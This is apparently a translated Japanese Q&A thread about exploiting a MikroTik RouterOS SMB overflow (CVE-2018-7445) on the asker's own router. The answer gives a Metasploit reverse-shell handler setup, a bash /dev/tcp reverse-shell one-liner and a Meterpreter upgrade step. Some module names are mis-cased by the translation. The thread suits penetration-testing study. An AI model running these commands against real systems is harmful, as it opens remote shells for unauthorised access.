Nessusをローカルネットワークで実行したところ、ルーターに重大な脆弱性が見つかりました。
MikroTik RouterOS < 6.41.3 SMB Buffer Overflow
(脆弱性の説明: Exploit-db )
しかし、この脆弱性のメタスプロイトに対応するエクスプロイトは見つかりません。 msfconsoleでsearch CVE-2018-7445
が結果を返しませんでした。
Meterpreterでmetasploitのエクスプロイトを使用する方法はありますか?
基本的には、exploit-dbリンクのエクスプロイトを使用してシェルを取得し、Metasploitハンドラーを開始する必要があります。
use exploit/multi/handler
set LHOST [local ip address]
set LPORT 4444
set payload linux/x86/Shell/reverse_tcp
run
ペイロードハンドラーが実行されたら、ルーターから逆のTCP=接続を確立して、Metasploitでセッションを取得できます。
bash -i >& /dev/tcp/[local ip address]/4444 0>&1
次に、セッションのバックグラウンドを設定し、モジュールを使用します post/multi/manage/Shell_to_meterpreter
シェルをMeterpreterシェルにアップグレードします。